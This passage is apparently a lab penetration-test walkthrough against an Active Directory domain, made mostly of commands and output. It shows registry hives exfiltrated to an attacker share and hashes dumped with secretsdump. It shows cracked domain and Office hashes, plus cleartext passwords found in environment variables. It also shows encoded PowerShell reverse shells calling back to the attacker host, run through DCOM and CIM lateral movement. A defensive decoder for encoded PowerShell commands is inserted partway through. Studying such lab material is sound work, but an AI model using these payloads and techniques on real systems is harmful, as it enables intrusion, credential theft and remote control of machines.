PS C:\Windows\System32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Updated 3 rule(s).
Ok.

4. Created an explicit inbound allow rule for TCP 3389 (redundant with step 3, which already enabled the built-in Remote Desktop rule group, but harmless)

PS C:\Windows\System32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow
New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow

Name                          : {4d148bf4-6323-4b7b-b15d-e892e23df342}
DisplayName                   : Open Port 3389
Description                   :
DisplayGroup                  :
Group                         :
Enabled                       : True
Profile                       : Any
Platform                      : {}
Direction                     : Inbound
Action                        : Allow
EdgeTraversalPolicy           : Block
LooseSourceMapping            : False
LocalOnlyMapping              : False
Owner                         :
PrimaryStatus                 : OK
Status                        : The rule was parsed successfully from the store. (65536)
EnforcementStatus             : NotApplicable
PolicyStoreSource             : PersistentStore
PolicyStoreSourceType         : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId                   :
PackageFamilyName             :

5. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.

PS C:\Windows\System32> netstat -ano | findstr 3389
netstat -ano | findstr 3389
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3048
  TCP    [::]:3389              [::]:0                 LISTENING       3048
  UDP    0.0.0.0:3389           *:*                                    3048
  UDP    [::]:3389              *:*                                    3048

6. Stopped impacket-ntlmrelayx (freeing port 445) and started Samba

[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.14.100, attacking target smb://10.10.14.120
[*] Authenticating against smb://10.10.14.120 as AD/FRANCESCA SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 10.10.14.120
[-] SMB SessionError: code: 0xc0000043 - STATUS_SHARING_VIOLATION - A file cannot be opened because the share access flags are incompatible.
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
^C

┌──(kali㉿kali)-[~]
└─$ sudo systemctl start smbd                                                                                                                                                                
[sudo] password for kali:

7. Mounted the Samba Share and Saved Windows Registry Hives (SAM, SYSTEM, SECURITY) to Samba Share

PS C:\Windows\System32> net use \\10.10.14.10\samba /user:kali kali
net use \\10.10.14.10\samba /user:kali kali
The command completed successfully.

PS C:\Windows\System32> reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
The operation completed successfully.
The operation completed successfully.
The operation completed successfully.

8. Confirmed the ADMIN04 Registry Hives were Successfully Downloaded

┌──(kali㉿kali)-[~]
└─$ ls samba
sam.save  security.save  system.save

9. Dumped ADMIN04 Hashes with impacket-secretsdump

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam ~/samba/sam.save -system ~/samba/system.save -security ~/samba/security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x5b26856cd61750e059093f5a94acffa8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:78b4cfba2bbf3d1fd4215c906b9a8cc1:::
LocalUser:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[*] Dumping cached domain logon information (domain/username:hash)
AD.LAB/Francesca:$DCC2$10240#Francesca#e267a6b5bcfa08e0b681b6da47b09e46: (2025-02-16 06:33:49)
AD.LAB/Administrator:$DCC2$10240#Administrator#a01d80260b293cd51b7518b02a74adb3: (2025-02-15 05:19:41)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:4800730044002600480031004e003b007a002e0028002b0049004c007500410062006e007a0038006a007a003b0043007a00770041004b00270048006c007000540075006c0075003000790025006e00570037005700330029007300770073003a0020003f00390058006b004e004c005600340068005a0064003500670075003c0073002200490044005c0046006900290065004f004600510030004d002d00770059006700700046007500200056006b0023004600780078006e006f0041004c002e0025007a003b002e00520035003600700035002f0058005b0078007600450068005400360066002d0025002100
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe72f9c0b712a41b62467781048244d0
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x42ce1a5ea6754418c5b55b31ad5e8722c74b71c8
dpapi_userkey:0x721b3f63acb4e1630095e0a8f219eec71e4ef431
[*] NL$KM 
 0000   0C 76 12 21 2C 9E 28 F4  18 3E 16 11 DF 55 1A A8   .v.!,.(..>...U..
 0010   14 72 CF 32 B8 EA 23 61  05 F9 31 61 8B 71 03 34   .r.2..#a..1a.q.4
 0020   EA A0 78 7C 4A 46 9E F8  29 E8 F8 90 57 D8 E4 04   ..x|JF..)...W...
 0030   D5 6A FB 09 FA D5 41 85  DF 27 AB 61 47 E5 86 1B   .j....A..'.aG...
NL$KM:0c7612212c9e28f4183e1611df551aa81472cf32b8ea236105f931618b710334eaa0787c4a469ef829e8f89057d8e404d56afb09fad54185df27ab6147e5861b
[*] Cleaning up... 

10. Cracked Francesca's Cached Domain Credential (DCC2) Hash with Hashcat, revealing the password "bubbelinbunny_1". DCC2 values cannot be replayed like NT hashes, so cracking is the only way to use them; at roughly 8 kH/s on this CPU a full pass over rockyou takes about 30 minutes.

┌──(kali㉿kali)-[~]
└─$ hashcat -m 2100 -a 0 '$DCC2$10240#Francesca#e267a6b5bcfa08e0b681b6da47b09e46' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46
Time.Started.....: Sat Feb  8 03:45:37 2025 (1 min, 18 secs)
Time.Estimated...: Sat Feb  8 04:15:13 2025 (28 mins, 18 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     8079 H/s (6.05ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 622592/14344390 (4.34%)
Rejected.........: 0/622592 (0.00%)
Restore.Point....: 622592/14344390 (4.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7680-7936
Candidate.Engine.: Device Generator
Candidates.#1....: magley -> ls1983
Hardware.Mon.#1..: Util: 95%

$DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46:bubbelinbunny_1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46
Time.Started.....: Sat Feb  8 03:45:37 2025 (2 mins, 4 secs)
Time.Estimated...: Sat Feb  8 03:47:41 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     8093 H/s (6.09ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1001472/14344390 (6.98%)
Rejected.........: 0/1001472 (0.00%)
Restore.Point....: 999424/14344390 (6.97%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9984-10239
Candidate.Engine.: Device Generator
Candidates.#1....: bulera -> brittanyrennick
Hardware.Mon.#1..: Util: 96%

Started: Sat Feb  8 03:45:35 2025
Stopped: Sat Feb  8 03:47:42 2025

11. Initiated an RDP session to ADMIN04 using Francesca's Credentials

┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:francesca /p:bubbelinbunny_1 /v:10.10.14.120
[03:53:49:249] [20204:20205] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[03:53:49:249] [20204:20205] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:53:49:290] [20204:20205] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:53:49:291] [20204:20205] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:53:50:879] [20204:20205] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[03:53:50:258] [20204:20205] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 562 bytes remaining unhandled. Skipping.

12. Generated a base64-encoded payload for port 4449

┌──(kali㉿kali)-[~]
└─$ vim encode4449.py
import base64

# PowerShell one-liner that connects back to the Kali listener on 10.10.14.10:4449
payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.10",4449);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# -EncodedCommand takes base64 of the script's UTF-16LE bytes; encoding with
# 'utf-16-le' yields exactly that, so no BOM has to be sliced off afterwards
cmd = "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand " + base64.b64encode(payload.encode('utf-16-le')).decode()

print(cmd)

┌──(kali㉿kali)-[~]
└─$ python encode4449.py
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand 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

13. Used DCOM to create an instance of the MMC20.Application COM object on ADMIN02, establishing a remote object for command execution.

PS C:\Users\francesca> $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1", "10.10.14.140"))

14. Executed the base64-encoded PowerShell command on the remote system via the DCOM object’s shell command execution method.

PS C:\Users\francesca> $dcom.Document.ActiveView.ExecuteShellCommand("powershell", $null, "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand 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", "7")

ADMIN03 Attacks

1. Spawned a Reverse Shell on ADMIN03, as Francesca

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4449
listening on [any] 4449 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.140] 49740
whoami; hostname
ad\francesca
ADMIN03

2. Checked Shell Integrity Level

PS C:\WINDOWS\system32> whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ===============================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

3. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.

PS C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

4. Enabled Remote Desktop in the Windows firewall

PS C:\WINDOWS\system32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Updated 3 rule(s).
Ok.

5. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.

PS C:\WINDOWS\system32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow

Name                          : {2ae4f7fb-9fd8-4dee-bb52-e3cec491042c}
DisplayName                   : Open Port 3389
Description                   :
DisplayGroup                  :
Group                         :
Enabled                       : True
Profile                       : Any
Platform                      : {}
Direction                     : Inbound
Action                        : Allow
EdgeTraversalPolicy           : Block
LooseSourceMapping            : False
LocalOnlyMapping              : False
Owner                         :
PrimaryStatus                 : OK
Status                        : The rule was parsed successfully from the store. (65536)
EnforcementStatus             : NotApplicable
PolicyStoreSource             : PersistentStore
PolicyStoreSourceType         : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId                   :
PackageFamilyName             :

6. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.

PS C:\WINDOWS\system32> netstat -ano | findstr 3389
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       8600
  TCP    [::]:3389              [::]:0                 LISTENING       8600
  UDP    0.0.0.0:3389           *:*                                    8600
  UDP    [::]:3389              *:*

7. Initiated an RDP session to ADMIN03 using Francesca's Credentials

┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:francesca /p:bubbelinbunny_1 /v:10.10.14.140
[19:31:40:390] [83046:83047] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[19:31:40:390] [83046:83047] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[19:31:40:458] [83046:83047] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[19:31:40:458] [83046:83047] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[19:31:41:982] [83046:83047] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_BUMP_OPTIONS]

8. Listed all environment variables for the current session. Found "SeventhPassword".

PS C:\Users\francesca> Get-ChildItem Env:

Name                           Value
----                           -----
AdminPassword                  mc_monkey_1
ALLUSERSPROFILE                C:\ProgramData
APPDATA                        C:\WINDOWS\system32\config\systemprofile\AppData\Roaming
CommonProgramFiles             C:\Program Files\Common Files
CommonProgramFiles(x86)        C:\Program Files (x86)\Common Files
CommonProgramW6432             C:\Program Files\Common Files
COMPUTERNAME                   ADMIN03
ComSpec                        C:\WINDOWS\system32\cmd.exe
DriverData                     C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA                   C:\WINDOWS\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS           2
OS                             Windows_NT
Path                           C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPo...
PATHEXT                        .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE         AMD64
PROCESSOR_IDENTIFIER           Intel64 Family 6 Model 183 Stepping 1, GenuineIntel
PROCESSOR_LEVEL                6
PROCESSOR_REVISION             b701
ProgramData                    C:\ProgramData
ProgramFiles                   C:\Program Files
ProgramFiles(x86)              C:\Program Files (x86)
ProgramW6432                   C:\Program Files
PSExecutionPolicyPreference    Bypass
PSModulePath                   WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\syste...
PUBLIC                         C:\Users\Public
SystemDrive                    C:
SystemRoot                     C:\WINDOWS
TEMP                           C:\WINDOWS\TEMP
TMP                            C:\WINDOWS\TEMP
USERDOMAIN                     AD
USERNAME                       ADMIN03$
USERPROFILE                    C:\WINDOWS\system32\config\systemprofile
windir                         C:\WINDOW

9. Confirmed Authentication to the SMB service on ADMIN02 using the AdminPassword value.

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.14.160 -u 'gregory' -p 'mc_monkey_1'
SMB         10.10.14.160    445    ADMIN02          [*] Windows 10.0 Build 26100 x64 (name:ADMIN02) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB         10.10.14.160    445    ADMIN02          [+] AD.LAB\gregory:mc_monkey_1

10. Enumerated all available SMB shares on ADMIN02.

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.14.160 -u 'gregory' -p 'mc_monkey_1' --shares
SMB         10.10.14.160    445    ADMIN02          [*] Windows 10.0 Build 26100 x64 (name:ADMIN02) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB         10.10.14.160    445    ADMIN02          [+] AD.LAB\gregory:mc_monkey_1
SMB         10.10.14.160    445    ADMIN02          [*] Enumerated shares
SMB         10.10.14.160    445    ADMIN02          Share           Permissions     Remark
SMB         10.10.14.160    445    ADMIN02          -----           -----------     ------
SMB         10.10.14.160    445    ADMIN02          ADMIN$                          Remote Admin
SMB         10.10.14.160    445    ADMIN02          AdminDocs       READ
SMB         10.10.14.160    445    ADMIN02          C$                              Default share
SMB         10.10.14.160    445    ADMIN02          IPC$            READ            Remote IPC

11. Opened an interactive SMB session on ADMIN02.

┌──(kali㉿kali)-[~]
└─$ impacket-smbclient ad.lab/gregory:'mc_monkey_1'@10.10.14.160
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands

12. Listed the Available Shares on ADMIN02.

# shares
ADMIN$
AdminDocs
C$
IPC$

13. Switched the current share context to the "AdminDocs" share.

# use AdminDocs

14. Listed the contents of the current share.

# ls

15. Downloaded "Instructions.docx" from the remote share

# get Instructions.docx

16. Exited impacket-smbclient

# exit

17. Extracted the Office document's hash from "Instructions.docx" and saved it to "hash.txt" for cracking.

┌──(kali㉿kali)-[~]
└─$ /usr/share/john/office2john.py ~/Instructions.docx > hash.txt

18. Removed the "<filename>:" prefix at the beginning of the hash:

┌──(kali㉿kali)-[~]
└─$ vim hash.txt
$office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a1ade8de41*09b02be4a378f67420ea7f3c46d84f57*2bf86a5bee591bc7508b4718a11a62d6fb18746c4397fbb58cb9e9e6ebfefe13

19. Used Hashcat on the protected Word Doc, revealing the password "abc123"

┌──(kali㉿kali)-[~]
└─$ hashcat -m 9600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344388
* Bytes.....: 139921561
* Keyspace..: 14344388
$office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a1ade8de41*09b02be4a378f67420ea7f3c46d84f57*2bf86a5bee591bc7508b4718a11a62d6fb18746c4397fbb58cb9e9e6ebfefe13:abc123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a...fefe13
Time.Started.....: Tue Feb  4 22:21:12 2025 (2 secs)
Time.Estimated...: Tue Feb  4 22:21:14 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      247 H/s (5.11ms) @ Accel:512 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344388 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SeventhPassword123 -> fuckyou1
Hardware.Mon.#1..: Util: 87%
Started: Tue Feb  4 22:20:58 2025
Stopped: Tue Feb  4 22:21:15 2025

20. Used the cracked password to access the Word Document, revealing Helen's password ("chase#1")

The Word Doc has this message:
Use these credentials to log into ADMIN02. Note that remote logins are not allowed and will not work. You can only connect to ADMIN02 if you’re physically in the office.
Helen
chase#1

21. Generated a base64-encoded payload for port 4450

┌──(kali㉿kali)-[~]
└─$ vim encode4450.py
import base64

# PowerShell one-liner that connects back to the Kali listener on 10.10.14.10:4450
payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.10",4450);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# -EncodedCommand (-e) takes base64 of the script's UTF-16LE bytes; encoding with
# 'utf-16-le' yields exactly that, so no BOM has to be sliced off afterwards
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16-le')).decode()

print(cmd)

┌──(kali㉿kali)-[~]
└─$ python encode4450.py
powershell -nop -w hidden -e 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
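Steps 12 and 21 both rely on the same encoding detail: PowerShell's -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, which is why the encoder scripts above convert to UTF-16 before base64. From the defender's side the interesting operation is the reverse: pulling the script back out of a process-creation command line so it can be read. The following is an added example, not code from the original writeup; it implements both directions in Python and runs a few constructed triage heuristics (the INDICATORS tuple and the TEST-NET sample command line are assumptions made for this example, not a vendor signature set).

```python
import base64
import re
from typing import Optional

# Any unambiguous prefix of -EncodedCommand that PowerShell accepts (case-insensitive).
ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Constructed triage heuristics for this example, not a vendor signature set.
INDICATORS = (
    "System.Net.Sockets.TCPClient",
    "iex ",
    "Invoke-Expression",
    "DownloadString",
    "GetStream()",
)


def encode_for_powershell(script: str, with_bom: bool = False) -> str:
    """Produce the base64 argument PowerShell expects: UTF-16LE bytes, no BOM.

    with_bom=True reproduces what str.encode('utf16') emits on a little-endian
    host (a leading FF FE), which PowerShell tolerates but does not need.
    """
    raw = script.encode("utf-16-le")
    if with_bom:
        raw = b"\xff\xfe" + raw
    return base64.b64encode(raw).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (or -e/-ec/-enc), else None."""
    args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        if ENCODED_FLAG.match(arg):
            token = args[i + 1].strip("'\"")
            try:
                raw = base64.b64decode(token)
            except ValueError:  # binascii.Error: not valid base64
                return None
            # PowerShell decodes the bytes as UTF-16LE; drop a BOM if one was included.
            return raw.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    return None


def find_indicators(script: str) -> list:
    """Case-insensitive substring hits from INDICATORS, in tuple order."""
    low = script.lower()
    return [s for s in INDICATORS if s.lower() in low]


def triage(cmdline: str) -> dict:
    """Summarise one process-creation command line for an analyst."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "indicators": []}
    return {"encoded": True, "script": script, "indicators": find_indicators(script)}


# Constructed sample resembling the lab's encoded launcher (TEST-NET address, not a real host).
SAMPLE_SCRIPT = '$c = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4449);$s = $c.GetStream();iex $d'
SAMPLE_CMDLINE = "powershell -nop -w hidden -e " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Feed `triage()` the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688 records; the decoded script, not the base64 blob, is what belongs in the alert and in any hunting query.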

22. Enabled PowerShell remoting on the local machine, allowing it to execute commands on other computers (in Francesca's RDP session)

PS C:\Users\francesca> Enable-PSRemoting -Force
WinRM has been updated to receive requests.
WinRM service type changed successfully.
WinRM service started.

WinRM has been updated for remote management.
WinRM firewall exception enabled.

23. Configured WinRM to trust the host (ADMIN02) for remote management.

PS C:\Users\francesca> Set-Item WSMan:\localhost\Client\TrustedHosts -Value 10.10.14.160 -Force

24. Retrieved and displayed the current WinRM TrustedHosts setting.

PS C:\Users\francesca> Get-Item WSMan:\localhost\Client\TrustedHosts


   WSManConfig: Microsoft.WSMan.Management\WSMan::localhost\Client

Type            Name                           SourceOfValue   Value
----            ----                           -------------   -----
System.String   TrustedHosts                                   10.10.14.160

25. Created new CIM session options configured to use the WSMan protocol.

PS C:\Users\francesca> $sessionOpts = New-CimSessionOption -Protocol WSMan

26. Generated a PSCredential object for the user "AD\helen" using the password found in the Word Document.

PS C:\Users\francesca> $cred = New-Object System.Management.Automation.PSCredential("AD\helen",(ConvertTo-SecureString "chase#1" -AsPlainText -Force))

27. Established a new CIM session to ADMIN02 using WSMan options and the specified credentials.

PS C:\Users\francesca> $session = New-CimSession -ComputerName 10.10.14.160 -SessionOption $sessionOpts -Credential $cred

28. Defined a PowerShell command that runs with no profile in a hidden window using a base64-encoded payload.

PS C:\Users\francesca> $command = 'powershell -nop -w hidden -e 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'

29. Executed the specified PowerShell command on the remote host by creating a new process via the established CIM session.

PS C:\Users\francesca> Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $command }

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
      412           0 10.10.14.160

ADMIN02 Attacks

1. Spawned a Reverse Shell on ADMIN02, as Helen

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4450
listening on [any] 4450 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.160] 50130
whoami; hostname
ad\helen
ADMIN02

2. Confirmed Shell Integrity Level

PS C:\WINDOWS\system32> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ===============================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

3. Modified the registry to enable Remote Desktop, by setting the fDenyTSConnections value to 0.

PS C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

4. Enabled Remote Desktop in the Windows firewall

PS C:\WINDOWS\system32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Updated 3 rule(s).
Ok.

5. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.

PS C:\WINDOWS\system32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow

